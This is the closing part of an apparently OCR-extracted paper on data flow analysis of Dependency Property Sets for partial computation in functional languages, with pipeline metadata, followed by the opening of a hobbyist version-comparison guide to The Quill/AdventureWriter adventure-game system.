\prod \text{ DPS}_i & = \text{ DPS}_1 \times \prod \text{ DPS}_j \\
& = \text{ DPS}_1
\end{align*}
\]
(for $n > 1$)
(for $n = 1$)
(for $n > 1$)
(for $n = 1$)
(3) DPS reduction operators
In the DPS normalization procedure, DPSs are iteratively reduced by DPS reduction, i.e. parameters in each DPS are replaced with the DPS$S$ of the parameters in DE$. Since a DPS of a function "f" is a set which contains all MSPS of "f", the result of DPS reduction is equal to the union of the results which are obtained by replacing parameters in each MSPS of the DPS with DPS$S$ of the parameters in DE$. Such a replacement is called MSPS reduction. Therefore, using an operator for MSPS reduction, named "reduce-m", an operator for DPS reduction, named "reduce", can be defined as follows:
\[
\text{reduce}(\text{DPS, DE$S$}) = \sum \text{reduce-m}(\text{MSPS, DE$S$})
\]
(for all MSPS in DPS)
On the other hand, since a MSPS of "f" is a set of minimal parameters with which "f" returns a defined value, the result of MSPS reduction is a Cartesian product of the results which are obtained by replacing each parameter in the MSPS with DPS$S$ of the parameter in DE$. Such a replacement is called parameter reduction. Consequently, using an operator for parameter reduction, named "reduce-p", "reduce-m" can be defined as follows.
\[
\text{reduce-m}(\text{MSPS, DE$S$}) = \prod \text{reduce-p}(\text{parameter, DE$S$})
\]
(for all parameter in MSPS)
When a parameter in MSPS is "P", the operation \(\text{reduce-p}(P, \text{DE$S$})\)
Data Flow Analysis for DPSs
is informally defined according to the attribute of "P" as follows.
reduce-p(P, DE$)
= {case
{P is a formal parameter} -> {{P}};
{P is a variable name other than a formal parameter
and there exists no TDPS$ of P in DE$} -> {{P}};
{P is a variable name other than a formal parameter
but there exists a TDPS$ of P, referred to as "T",
in DE$} -> { return DPS$ in "T" };
{P is function-application-form, which refers to
function "f" and there exists no TDPS$ of "f"
in DE$} -> {{P}};
{P is function-application-form with a function
name "f" and parameter-DPS-list (d1 d2 ... dn).
In addition, there exists a TDPS$ of "f",
referred to as "T", in DE$,
where T = (f (x1 x2 ... xn) D$)} ->
{begin
{A list of DPS$ for actual parameters,
named "A$", is obtained by the
following operations.
A$=(a1 a2 ... an) and
ai=reduce(di,DE$) for i=1 to n}
{All formal parameters in DPS$ of "T" are
replaced with "A$", i.e. each xi in D$
is replaced with ai for all i = 1 to n}
end}
}
4.3 Algorithm for the DPS Normalization
It is necessary to replace variable names, which are defined in
a block expression, with their DPSs in order to reduce a DPS to its
normal form in the block. An algorithm for such a replacement is
trivial if no DPS in a block expression contains
function-application-forms. However, it requires rather complicated
data flow analysis, if function names are mutually referenced in two
function definitions in a block expression or are cyclically
referred in some function definitions in a block expression. In
this sub-section, an iterative procedure for reducing DPSs to normal
forms in block expressions is provided.
Data Flow Analysis for DPSs
An operation N(ENV) transforms a DE "ENV" into a new DE "NENV" which is in a normal form, i.e. all DPSs in "NENV" contain only formal parameters and free variables in "ENV". Therefore, if "ENV" contains DPSs for all functions defined in a scope, "NENV" contains all of the DPSs which are transformed into normal forms in the scope. The operator N is an iterative procedure which consists of four phases as shown in Fig. 4-2.
```
DE
|<--------------------------------
V
PHASE 1 : Flattening
V
PHASE 2 : DPS Reduction | Not Converge.
V
PHASE 3 : Convergence Check --
| All DPS$ converge.
V
PHASE 4 : $-Elimination
V
Normalized DE
```
Fig. 4-2 DPS Normalization Procedure
Functions of the four phases in the procedure are described as follows.
[Algorithm of DPS Normalization Operator N]
**PHASE 1 -- Initialize Iteration : Flattening --**
All DPSs in the input DE "ENV" are transformed into DPS$S$, called the flat form, i.e. all function-application-forms in each DPS are replaced with the symbol "$\$". In addition, TDPSS$ and DE$ "ENV$" are constructed using DPS$$. Then, PHASE 2 is activated.
**PHASE 2 -- DPS Reduction --**
Data Flow Analysis for DPSs
Each DPS in "ENV" is reduced using "ENVS", resulting in a TDPS$. The TDPS$s for all DPSs constitute a new DES named "NEVNS". The reduction proceeds as follows:
1. A TDPS "t" is chosen from "ENV" for the DPS reduction, where the name of "t" and the DPS in "t" are referred to as "n" and "d", respectively.
2. A new DPS "$nd$" for "n" is obtained by DPS reduction, i.e. $nd$=reduce(d,ENV$).
3. The TDPS$ with the name "n" is chosen from "ENVS" and is referred to as "t$". A DPS$ of "t$", named "d$", is also chosen.
4. "t$" is set to be in the "CONVERGE" status if nd$=d$.
Otherwise, it is set to be in the "TEMPORARY" status.
When all DPSs in "ENV" are reduced, PHASE 3 is activated.
PHASE 3 -- Check End of Iteration: Convergence Check --
If all TDPS$ in "NEVNS" converge, i.e. if no TDPS$ in "NEVNS" is in "TEMPORARY" status, the iteration is terminated and PHASE 4 is activated. Otherwise, PHASE 2 is activated to further reduce DPSs, using "NEVNS" as a new "ENV$".
PHASE 4 -- $-Elimination --
An MSPS in each TDPS$ in "NEVNS" is eliminated if the MSPS contains the symbol "$". The results of the elimination constitute a normal form of "ENV".
4.4 Algorithm for Obtaining Normalized DPSs
In this sub-section, an algorithm for obtaining normalized DPSs is described by means of set-operators for DPSs and a DPS normalization operator introduced in the previous sub-sections. According to an attribute of an input expression defined in Valid
Data Flow Analysis for DPSs
syntax [8], an operator, named D, transforms the expression in a program into the normal form of the expression's DPS. The algorithm of the operator D is informally defined as follows.
\[ D(e) = \begin{cases}
\text{case} \\
\text{free-variable-name} \rightarrow \{\{e\}\}; \\
\text{local-defined-variable-name} \rightarrow D(\text{value-definition of } e); \\
\text{strict-primitive-function-application} \rightarrow \bigwedge \text{D(ei)}; \\
\text{(for all operand expressions } \text{ei in } e) \\
\text{if-then-else-fi} \rightarrow D(\text{predicate-expression}) \ast D(\text{then-part-expression}) \\
+ D(\text{predicate-expression}) \ast D(\text{else-part-expression}); \\
\text{value-definition} \rightarrow D(\text{defined-expression}); \\
\text{function-definition} \rightarrow D(\text{defined-function-body}); \\
\text{non-primitive-function-application} \rightarrow \{(\text{function-name } D(\text{arg1}) D(\text{arg2}) \ldots D(\text{arg-n}))\}; \\
\text{block-expression} \rightarrow \\
\{\text{begin} \\
\{\text{Transform the return expression of this block-expression to the value definition with a unique name.} \\
\text{Suppose the name is } "&r". \\
\text{As the results that the operator D is applied to each variable definition in the block, a DE } "\text{ENV}" \text{ in the block expression is created.} \} \\
\text{The } "\text{ENV}" \text{ is transformed into its normal form } "\text{NENV}" \text{ by } \text{NENV}=N(\text{ENV}). \} \\
\text{A DPS in the TDPS with the value-name } "&r" \text{ is returned.} \} \\
\text{end}\}
\end{cases}\]
The algorithm for obtaining normalized DPSs described in this section has been implemented using TAO-Lisp [14] under VAX/VMS. The program consists of about 600 lines, and the execution results of the program for several examples are shown in the next section.
Examples of the DPS Computation
5. Examples of the DPS Computation
This section provides examples of DPS computation using the algorithm presented in Section 4. Examples are ordered in complexity.
5.1 Simple Expressions
The first example is a block expression without function definitions.
[Program 1]
\[
\{ a=x*y; b=x+z; x=g*h; y=x*g; z=r+s; \text{return } a \}
\]
Processed Block ::
\[
\{ a=x*y; b=x+z; x=g*h; y=x*g; z=r+s; \text{return } a \}
\]
Dependency Property Set of the Block ::
\[
\{ g,h \}
\]
Thus, the result of this block expression is defined by the free variables "g" and "h", although "r" and "s" are also free.
5.2 Function Application
[Program 2]
\[
f=^\wedge[[k,u] \text{ if } u=0 \text{ then } 0 \text{ else } f(k+1,u-1) \text{ fi}]
\]
Notice that this program is equivalent to
\[
f=^\wedge[[k,u] \text{ if } u\geq0 \text{ then } 0 \text{ else } w \text{ fi}].
\]
Processed Block ::
\[
\text{if } u=0 \text{ then } 0 \text{ else } f(k+1,u-1) \text{ fi}
\]
Dependency Property Set of the Block ::
\[
\{ \{u\}, \{u,(f \{\{k\}\} \{\{u\}\})\} \}
\]
Initial DPSs of functions in the surrounding block
\[
\text{FUNC } f(k,u) : \text{ Initial DPS } = \{ \{u\}, \{u,(f \{\{k\}\} \{\{u\}\})\} \}
\]
<< Iterative Procedure >>
Examples of the DPS Computation
STEP : 0 TEMPORARY status : {f}
FUNC f(k,u) : DPS = { {u} }
STEP : 1 CONVERGE status : {f}
FUNC f(k,u) : DPS = { {u} }
--- End of Iteration ---
Dependency Property Set of the Block ::
FUNC f(k,u) : DPS = { {u} }
Therefore, the result of "f" in Program 2 is determined by the second parameter only.
5.3 Mutual Recursion
[Program 3]
{ f^{{[x,y]} if x>0 then f(x-1,y+1) else g(x,y) fi};
g^{{[x,y]} if x==0 then y else f(-x,-y) fi} }
This program is equivalent to
f^{{[x,y]}x+y}.
Processed Block ::
if x>0 then f(x-1,y+1) else g(x,y) fi
Dependency Property Set of the Block ::
{ {x,(f {{x}} {{y}})}, {x,(g {{x}} {{y}})} }
Processed Block ::
if x==0 then y else f(-x,-y) fi
Dependency Property Set of the Block ::
{ {x,y}, {x,(f {{x}} {{y}})} }
Initial DPSs of functions in the surrounding block
FUNC f(x,y) : Initial DPS = { {x,(f {{x}} {{y}})},
{x,(g {{x}} {{y}})} }
FUNC g(x,y) : Initial DPS = { {x,y}, {x,(f {{x}} {{y}})} }
Initial DPSs are assumed to be $.
<< Iterative Procedure >>
STEP : 0 TEMPORARY status : {f,g}
FUNC f(x,y) : DPS = { {{$,x}$}}
Examples of the DPS Computation
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{STEP : 1 TEMPORARY status : } \{f\}
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{CONVERGE status : } \{g\}
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{STEP : 2 CONVERGE status : } \{f,g\}
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x,y\} \}
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x,y\} \}
Program 3 is an example in which the conventional maximal fixed point solution approach [7] yields an incorrect solution. The computation based on this approach is shown.
Initial DPSs are assumed to be null.
<< Iterative Procedure >>
\text{STEP : 0 TEMPORARY status : } \{f,g\}
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\} \}
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{STEP : 1 TEMPORARY status : } \{f\}
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{CONVERGE status : } \{g\}
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{STEP : 2 CONVERGE status : } \{f,g\}
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
\text{FUNC } g(x,y) : \text{DPS} = \{ \{x\}, \{x,y\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
examples of the DPS Computation
FUNC f(x,y) : DPS = { {x}, {x,y} }
FUNC g(x,y) : DPS = { {x}, {x,y} }
Since "x+y" cannot be evaluated without "y", it is incorrect to include a parameter set \{x\} in the DPS of "f".
5.4 Nested Function Applications
[Program 4]
\{ f = ^[[k,u] if u==0 then 0 else f(k,f(u,k-1)) fi }
processed Block ::
if u==0 then 0 else f(k,f(u,k-1)) fi
Dependency Property Set of the Block ::
\{ \{u\}, \{u,(f \{\{k\}\} \{ (f \{\{u\}\} \{\{k\}\} )\})) \} \}
Initial DPSs of functions in the surrounding block
FUNC f(k,u) : Initial DPS
= \{ \{u\}, \{u,(f \{\{k\}\} \{ (f \{\{u\}\} \{\{k\}\} )\})) \} \}
<< Iterative Procedure >>
STEP : 0 TEMPORARY status : \{f\}
FUNC f(k,u) : DPS = \{ \{u\} \}
STEP : 1 TEMPORARY status : \{f\}
FUNC f(k,u) : DPS = \{ \{u\}, \{k,u\} \}
STEP : 2 CONVERGE status : \{f\}
FUNC f(k,u) : DPS = \{ \{u\}, \{k,u\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
FUNC f(k,u) : DPS = \{ \{u\}, \{k,u\} \}
5.5 Nested Block Expressions
[Program 5]
\{ f = ^[[x,y]
\{ g = ^[[[a,b] a+a]; k = g(x,y)+x; return k+x \} \} \}
Examples of the DPS Computation
Processed Block ::
\{ g = \lceil[a,b) a+a] ; k = g(x,y)+x; \text{ return } k+x \}\}
Processed Block ::
a+a
Dependency Property Set of the Block ::
\{ \{a\} \}
Initial DPSs of functions in the surrounding block
\text{FUNC } g(a,b) : \text{ Initial DPS } = \{ \{a\} \}
<< Iterative Procedure >>
\text{STEP : 0 } \text{ TEMPORARY status : } \{g\}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
\text{STEP : 1 } \text{ CONVERGE status : } \{g\}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
Dependency Property Set of the Block ::
\{ \{x\} \}
Initial DPSs of functions in the surrounding block
\text{FUNC } f(x,y) : \text{ Initial DPS } = \{ \{x\} \}
<< Iterative Procedure >>
\text{STEP : 0 } \text{ TEMPORARY status : } \{f,g\}
\text{FUNC } f(x,y) : \text{ DPS } = \{ \{x\} \}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
\text{STEP : 1 } \text{ CONVERGE status : } \{g\}
\text{FUNC } f(x,y) : \text{ DPS } = \{ \{x\} \}
\text{FUNC } g(a,b) : \text{ DPS } = \{ \{a\} \}
--- End of Iteration ---
Dependency Property Set of the Block ::
examples of the DPS Computation
\[
\text{FUNC } f(x,y) : \text{DPS} = \{ \{x\} \} \\
\text{FUNC } g(a,b) : \text{DPS} = \{ \{a\} \}
\]
As shown above, DPSs of nested block expressions are evaluated from the inner to the outer one.
6. Conclusion
This paper has proposed a new partial computation method for functional programming languages, called the projected function method. This method makes it possible to execute general partial computation without the pre-binding capability that is essential to the partial computation of non-strict functions in the conventional method.
This paper has also presented a new concept called Dependency Property Set (DPS). The DPS indicates the dependency relation between function parameters and resultant values. The DPS concept plays an important role in the projected function method. An algorithm for computing DPSs based on the data flow analysis method is also shown.
In spite of its clearness, the most serious problem in functional programming has been computational inefficiency compared with side-effect based programming. Since partial computation enables intensive program optimization and computation sharing in a fully automatic way, significant computation reduction is possible. The computational power required for the projected function method is same as the computational power of the DCSB model. Therefore, this method in conjunction with the DCSB model offers a way to
realize highly-parallel and highly-effective functional programming machines.
Acknowledgements
The authors would like to thank Dr. Noriyoshi Kuroyanagi, Director of the Communication Principles Research Division at Musashino Electrical Laboratory for his constant guidance and encouragement. They also wish to thank the members of the dataflow system research group in the Communication Principles Research Section 2 for their thoughtful discussions and comments.
References
References
5. Kahn, K. A partial evaluator of Lisp written in a Prolog written in Lisp intended to be applied to the Prolog and itself which in turn is intended to be given to itself together with the Prolog to produce a Prolog compiler, UPMAIL, Dept. Computer Science, Uppsala Univ., (1982)
|
{"Source-Url": "https://repository.kulib.kyoto-u.ac.jp/dspace/bitstream/2433/98839/1/0547-10.pdf", "len_cl100k_base": 14845, "olmocr-version": "0.1.53", "pdf-total-pages": 35, "total-fallback-pages": 0, "total-input-tokens": 37292, "total-output-tokens": 17470, "length": "2e13", "weborganizer": {"__label__adult": 0.00029540061950683594, "__label__art_design": 0.0003275871276855469, "__label__crime_law": 0.00028014183044433594, "__label__education_jobs": 0.0007557868957519531, "__label__entertainment": 5.936622619628906e-05, "__label__fashion_beauty": 0.00012218952178955078, "__label__finance_business": 0.0002409219741821289, "__label__food_dining": 0.0003032684326171875, "__label__games": 0.0004456043243408203, "__label__hardware": 0.0010461807250976562, "__label__health": 0.0004127025604248047, "__label__history": 0.00019931793212890625, "__label__home_hobbies": 9.840726852416992e-05, "__label__industrial": 0.0004291534423828125, "__label__literature": 0.00022530555725097656, "__label__politics": 0.00019538402557373047, "__label__religion": 0.00044035911560058594, "__label__science_tech": 0.027557373046875, "__label__social_life": 6.818771362304688e-05, "__label__software": 0.005641937255859375, "__label__software_dev": 0.9599609375, "__label__sports_fitness": 0.0002396106719970703, "__label__transportation": 0.0004987716674804688, "__label__travel": 0.0001665353775024414}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 52111, 0.01581]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 52111, 0.67735]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 52111, 0.80916]], "google_gemma-3-12b-it_contains_pii": [[0, 948, false], [948, 2253, null], [2253, 3869, null], [3869, 5713, null], [5713, 7486, null], [7486, 8921, null], [8921, 10551, null], [10551, 12315, null], [12315, 14255, null], [14255, 15862, null], [15862, 17257, null], [17257, 18857, null], [18857, 20258, null], [20258, 22212, null], [22212, 23877, null], [23877, 25605, null], [25605, 27192, null], [27192, 28703, null], [28703, 30357, null], [30357, 31308, null], [31308, 32336, null], [32336, 33815, null], [33815, 35619, null], [35619, 37445, null], [37445, 38608, null], [38608, 40090, null], [40090, 41949, null], [41949, 43209, null], [43209, 44378, null], [44378, 45770, null], [45770, 46875, null], [46875, 48092, null], [48092, 49527, null], [49527, 50538, null], [50538, 52111, null]], "google_gemma-3-12b-it_is_public_document": [[0, 948, true], [948, 2253, null], [2253, 3869, null], [3869, 5713, null], [5713, 7486, null], [7486, 8921, null], [8921, 10551, null], [10551, 12315, null], [12315, 14255, null], [14255, 15862, null], [15862, 17257, null], [17257, 18857, null], [18857, 20258, null], [20258, 22212, null], [22212, 23877, null], [23877, 25605, null], [25605, 27192, null], [27192, 28703, null], [28703, 30357, null], [30357, 31308, null], [31308, 32336, null], [32336, 33815, null], [33815, 35619, null], [35619, 37445, null], [37445, 38608, null], [38608, 40090, null], [40090, 41949, null], [41949, 43209, null], [43209, 44378, null], [44378, 45770, null], [45770, 46875, null], [46875, 48092, null], [48092, 49527, null], [49527, 50538, null], [50538, 52111, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 52111, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 52111, null]], "pdf_page_numbers": [[0, 948, 1], [948, 2253, 2], [2253, 3869, 3], [3869, 5713, 4], [5713, 7486, 5], [7486, 8921, 6], [8921, 10551, 7], [10551, 12315, 8], [12315, 14255, 9], [14255, 15862, 10], [15862, 17257, 11], [17257, 18857, 12], [18857, 20258, 13], [20258, 22212, 14], [22212, 23877, 15], [23877, 25605, 16], [25605, 27192, 17], [27192, 28703, 18], [28703, 30357, 19], [30357, 31308, 20], [31308, 32336, 21], [32336, 33815, 22], [33815, 35619, 23], [35619, 37445, 24], [37445, 38608, 25], [38608, 40090, 26], [40090, 41949, 27], [41949, 43209, 28], [43209, 44378, 29], [44378, 45770, 30], [45770, 46875, 31], [46875, 48092, 32], [48092, 49527, 33], [49527, 50538, 34], [50538, 52111, 35]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 52111, 0.01223]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
15ebf549bc86cbf85cdb6d750c1cca05dd022b3c
|
Background
The Quill was created by Graeme Yeandle in 1983 and was published by Welsh software house Gilsoft. Various support programs were created over the years (e.g. The Illustrator) which added extra features on selected platforms. The Quill was the first in what is sometimes referred to as the "Gilsoft family" of adventure systems which includes the PAW, the SWAN, and DAAD.
Localised versions of The Quill were published by Norace in Norway, Denmark and Sweden, all on one disc/tape.
In the USA, the tool was sold under license as AdventureWriter by the publisher CodeWriter who included their own graphics system for some of the formats. CodeWriter "grey imported" a French language version to Europe.
Gilsoft's Quill was available for ZX Spectrum, Amstrad CPC, Commodore 64, BBC Micro & Acorn Electron, Sinclair QL, and Oric 1/Atmos. An Atari 800/XL version was developed but may not have been released.
CodeWriter's (US & French) version of the system was available for Commodore 64; Atari 800 and XL series computers with 48K; Apple II (II, II+, IIc) / Franklin Ace 1000; and IBM-PC (MS-DOS). The C64 and Apple/Franklin version had support for graphics.
Although The Quill only had a two-word parser, a special four-word version was created by Gilsoft for CRL. (The use of this version in a published game has not been confirmed) For hobbyist programmers, support for four word inputs could be added to Spectrum games by the use of the third-party The Fix program that was marketed by Kelsoft.
In addition to the commercial games produced using the Quill, several games used the system as a prototyping/development tool (such as Dodgy Geezers and Terrormolinos). There were also games released using (often uncredited) heavily modified versions of the Quill such as Rigel's Revenge and The Serf's Tale.
Purpose of this document
This guide is intended to collect together information about the various versions of the Quill. It is a work-in-progress.
This document is not a replacement for the excellent Quill manual or third-party programming guides, such as Simon Avery & Debby Howard’s book. Familiarity with at least one version of The Quill is presumed.
The document may be of particular use to adventure writers looking to produce a Quilled adventure targeting more than one platform, or those porting their existing games.
A note on serial numbers
Most releases of the Quill have serial numbers beginning with A.
The serial numbers of non-English versions start with a B.
The Spectrum version of the Quill was released in two distinct versions: Serial A and Serial C.
The early Serial A version of the Spectrum Quill had a basic level of CondActs (compared to the later versions that appeared on other platforms) and other restrictions, such as not being able to customise the system messages. For example, Serial A on the Spectrum did not have the advanced object-related CondActs (AUTOD, AUTOG, AUTOW, AUTOR) or word assignment for items, so authors had to manually code GET/DROP responses for each object.
Version C for the Spectrum was a major upgrade and is highly recommended as the version to use, particularly as it integrates with the other optional support programs.
Version C was available both as an upgrade from Gilsoft, with a supplementary booklet detailing the major changes, and also in an edition with a fully revised manual. A converter program was provided for Spectrum users to convert a serial A database to a serial C one.
Copyright
The Quill and associated software products are still covered by copyright. If you are producing adventures using the system (particularly if you plan on selling them) then you are encouraged to obtain an official copy of the software or make a donation to Tim Gilberths (https://www.paypal.me/timgilberts) .
# The Quill/AdventureWriter – Version Comparison
## Available Memory
<table>
<thead>
<tr>
<th>Platform</th>
<th>Serial</th>
<th>Available Memory*</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>The Quill</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ZX Spectrum+</td>
<td>A03, A06, A08</td>
<td>30553</td>
</tr>
<tr>
<td></td>
<td>C02+, C04+</td>
<td>29831</td>
</tr>
<tr>
<td></td>
<td>C05+</td>
<td>29431</td>
</tr>
<tr>
<td>Amstrad CPC</td>
<td>A00, A01</td>
<td>28283</td>
</tr>
<tr>
<td></td>
<td>A04</td>
<td>27995</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>A06, A06.4WD</td>
<td>31754</td>
</tr>
<tr>
<td></td>
<td>B02 *(Norace)</td>
<td>29769</td>
</tr>
<tr>
<td>BBC / Electron</td>
<td>A00 Tape <em>(on BBC 32K)</em></td>
<td>17493</td>
</tr>
<tr>
<td></td>
<td>A03 Disk <em>(on BBC 32K)</em></td>
<td>21588</td>
</tr>
<tr>
<td></td>
<td><em>(Electron version has 7K less available)</em></td>
<td></td>
</tr>
<tr>
<td>Sinclair QL</td>
<td></td>
<td>27686</td>
</tr>
<tr>
<td>Oric 1 / Atmos</td>
<td>A03</td>
<td>27686</td>
</tr>
<tr>
<td><strong>AdventureWriter</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Atari 800/XL</td>
<td></td>
<td>22923</td>
</tr>
<tr>
<td>Atari (French)</td>
<td>A01F</td>
<td>22923</td>
</tr>
<tr>
<td>Apple II / Franklin</td>
<td>A01</td>
<td>21760</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>A02</td>
<td>31754</td>
</tr>
<tr>
<td>IBM PC</td>
<td></td>
<td>58841 <em>(40 columns)</em></td>
</tr>
<tr>
<td></td>
<td></td>
<td>58065 <em>(80 columns)</em></td>
</tr>
</tbody>
</table>
* approximate value (for now), with the default database loaded... value as shown through “memory/bytes available” menu option... deletion of the default location, object & message text would create additional space.
+ without accounting for The Press compression or the extra 6938 (C02) / 7338 (C05) bytes made available when using The Expander.
Note: the BBC version features built-in text compression.
Screen Resolutions
(Usable screen area)
(Note: work in progress...)
<table>
<thead>
<tr>
<th>Platform</th>
<th>Characters per line</th>
<th>Lines per screen</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>The Quill</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ZX Spectrum</td>
<td>32</td>
<td>22</td>
</tr>
<tr>
<td>Amstrad CPC</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>BBC / Electron</td>
<td>40</td>
<td>25</td>
</tr>
<tr>
<td>Sinclair QL</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Oric 1 / Atmos</td>
<td>38* (variable size)</td>
<td>26</td>
</tr>
<tr>
<td><strong>AdventureWriter</strong></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Atari</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>Atari (French)</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>Apple II / Franklin</td>
<td></td>
<td>23</td>
</tr>
<tr>
<td>Commodore 64</td>
<td>40</td>
<td>23</td>
</tr>
<tr>
<td>IBM PC</td>
<td>40</td>
<td>24</td>
</tr>
</tbody>
</table>
Additional Version-Specific Features
(Note: work in progress...)
<table>
<thead>
<tr>
<th>Graphics Support</th>
<th>SPE</th>
<th>CPC</th>
<th>C64</th>
<th>BBC</th>
<th>QL</th>
<th>ORIC</th>
<th>ATARI</th>
<th>APPLE</th>
<th>C64</th>
<th>IBM</th>
</tr>
</thead>
<tbody>
<tr>
<td>Inverse Text</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Flashing Text</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Individually Coloured Text</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>Double height text</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>Yes</td>
<td></td>
</tr>
<tr>
<td>Compression</td>
<td>+Press</td>
<td>Yes*</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Ramsave/Ramload</td>
<td>+Patch</td>
<td>Yes</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Four Word Input</td>
<td>+Fix</td>
<td>(4wd)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Customisable System Messages</td>
<td>C only</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes*</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
<tr>
<td>User’s own machine code</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>Yes</td>
<td></td>
</tr>
</tbody>
</table>
*BBC compression routine acts on lower case letters and spaces for approximately 32% reduction
*In the BBC version the standard bank of messages are used by the system.
See list of CondActs for other version-specific elements.
## The Quill & AdventureWriter - List of CondActs
### Common Conditions
<table>
<thead>
<tr>
<th>AT</th>
<th>locno.</th>
</tr>
</thead>
<tbody>
<tr>
<td>NOTAT</td>
<td>locno.</td>
</tr>
<tr>
<td>ATGT</td>
<td>locno.</td>
</tr>
<tr>
<td>ATL</td>
<td>locno.</td>
</tr>
<tr>
<td>PRESENT</td>
<td>objno.</td>
</tr>
<tr>
<td>ABSENT</td>
<td>objno.</td>
</tr>
<tr>
<td>WORN</td>
<td>objno.</td>
</tr>
<tr>
<td>NOTWORN</td>
<td>objno.</td>
</tr>
<tr>
<td>CARRIED</td>
<td>objno.</td>
</tr>
<tr>
<td>NOTCARR</td>
<td>objno.</td>
</tr>
<tr>
<td>CHANCE</td>
<td>percent</td>
</tr>
<tr>
<td>ZERO</td>
<td>flagno.</td>
</tr>
<tr>
<td>NOTZERO</td>
<td>flagno.</td>
</tr>
<tr>
<td>EQ</td>
<td>flagno. value</td>
</tr>
<tr>
<td>GT</td>
<td>flagno. value</td>
</tr>
<tr>
<td>LT</td>
<td>flagno. value</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>NOTEQ</th>
<th>flagno.</th>
<th>BBC</th>
</tr>
</thead>
<tbody>
<tr>
<td>DESTROYED</td>
<td>objno.</td>
<td>BBC</td>
</tr>
<tr>
<td>CREATED</td>
<td>objno.</td>
<td>BBC</td>
</tr>
</tbody>
</table>
### Common Actions
<table>
<thead>
<tr>
<th>INVEN or INV (BBC)</th>
<th>DESC</th>
</tr>
</thead>
<tbody>
<tr>
<td>QUIT</td>
<td>END</td>
</tr>
<tr>
<td>DONE</td>
<td>OK</td>
</tr>
